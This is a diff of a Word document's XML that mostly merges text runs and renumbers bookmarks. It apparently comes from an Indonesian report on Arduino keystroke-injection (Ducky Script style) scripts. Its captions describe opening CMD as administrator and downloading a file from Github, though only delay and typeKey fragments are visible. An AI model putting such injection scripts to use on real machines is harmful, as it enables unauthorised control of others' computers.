-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29797,25 +28312,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29832,25 +28329,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29884,25 +28363,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29945,25 +28406,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Keyboard.end(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>);</w:t>
+                        <w:t xml:space="preserve">  Keyboard.end();</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30003,9 +28446,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="79" w:name="_Toc43087606"/>
-      <w:bookmarkStart w:id="80" w:name="_Toc43087900"/>
-      <w:bookmarkStart w:id="81" w:name="_Toc43258877"/>
+      <w:bookmarkStart w:id="94" w:name="_Toc43087606"/>
+      <w:bookmarkStart w:id="95" w:name="_Toc43087900"/>
+      <w:bookmarkStart w:id="96" w:name="_Toc43258877"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -30067,9 +28510,9 @@
         </w:rPr>
         <w:t>Ducky Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="79"/>
-      <w:bookmarkEnd w:id="80"/>
-      <w:bookmarkEnd w:id="81"/>
+      <w:bookmarkEnd w:id="94"/>
+      <w:bookmarkEnd w:id="95"/>
+      <w:bookmarkEnd w:id="96"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30333,23 +28776,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t>delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -30377,23 +28810,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t>typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -30404,23 +28827,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t>delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -30448,23 +28861,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t>delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -30475,23 +28878,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t>typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -30502,23 +28895,13 @@
                                 <w:szCs w:val="20"/>
                               </w:rPr>
                             </w:pPr>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t>delay(1000);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -30599,23 +28982,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t>delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30643,23 +29016,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t>typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30670,23 +29033,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t>delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30714,23 +29067,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t>delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30741,23 +29084,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t>typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30768,23 +29101,13 @@
                           <w:szCs w:val="20"/>
                         </w:rPr>
                       </w:pPr>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t>delay(1000);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -30808,9 +29131,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="82" w:name="_Toc43087607"/>
-      <w:bookmarkStart w:id="83" w:name="_Toc43087901"/>
-      <w:bookmarkStart w:id="84" w:name="_Toc43258878"/>
+      <w:bookmarkStart w:id="97" w:name="_Toc43087607"/>
+      <w:bookmarkStart w:id="98" w:name="_Toc43087901"/>
+      <w:bookmarkStart w:id="99" w:name="_Toc43258878"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -30862,9 +29185,9 @@
         </w:rPr>
         <w:t>. Baris perintah membuka CMD sebagai admin</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="82"/>
-      <w:bookmarkEnd w:id="83"/>
-      <w:bookmarkEnd w:id="84"/>
+      <w:bookmarkEnd w:id="97"/>
+      <w:bookmarkEnd w:id="98"/>
+      <w:bookmarkEnd w:id="99"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -31008,25 +29331,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31043,25 +29348,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31095,25 +29382,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31130,25 +29399,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -31201,25 +29452,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -31236,25 +29469,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -31288,25 +29503,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -31323,25 +29520,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -31364,9 +29543,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="85" w:name="_Toc43087608"/>
-      <w:bookmarkStart w:id="86" w:name="_Toc43087902"/>
-      <w:bookmarkStart w:id="87" w:name="_Toc43258879"/>
+      <w:bookmarkStart w:id="100" w:name="_Toc43087608"/>
+      <w:bookmarkStart w:id="101" w:name="_Toc43087902"/>
+      <w:bookmarkStart w:id="102" w:name="_Toc43258879"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -31435,9 +29614,9 @@
         </w:rPr>
         <w:t>untuk Membuat Folder</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="85"/>
-      <w:bookmarkEnd w:id="86"/>
-      <w:bookmarkEnd w:id="87"/>
+      <w:bookmarkEnd w:id="100"/>
+      <w:bookmarkEnd w:id="101"/>
+      <w:bookmarkEnd w:id="102"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -31591,25 +29770,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31626,25 +29787,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -31697,25 +29840,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -31732,25 +29857,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -31773,9 +29880,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="88" w:name="_Toc43087609"/>
-      <w:bookmarkStart w:id="89" w:name="_Toc43087903"/>
-      <w:bookmarkStart w:id="90" w:name="_Toc43258880"/>
+      <w:bookmarkStart w:id="103" w:name="_Toc43087609"/>
+      <w:bookmarkStart w:id="104" w:name="_Toc43087903"/>
+      <w:bookmarkStart w:id="105" w:name="_Toc43258880"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -31827,9 +29934,9 @@
         </w:rPr>
         <w:t>. Baris Perintah untuk Mengunduh File dari Github</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="88"/>
-      <w:bookmarkEnd w:id="89"/>
-      <w:bookmarkEnd w:id="90"/>
+      <w:bookmarkEnd w:id="103"/>
+      <w:bookmarkEnd w:id="104"/>
+      <w:bookmarkEnd w:id="105"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -32044,25 +30151,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
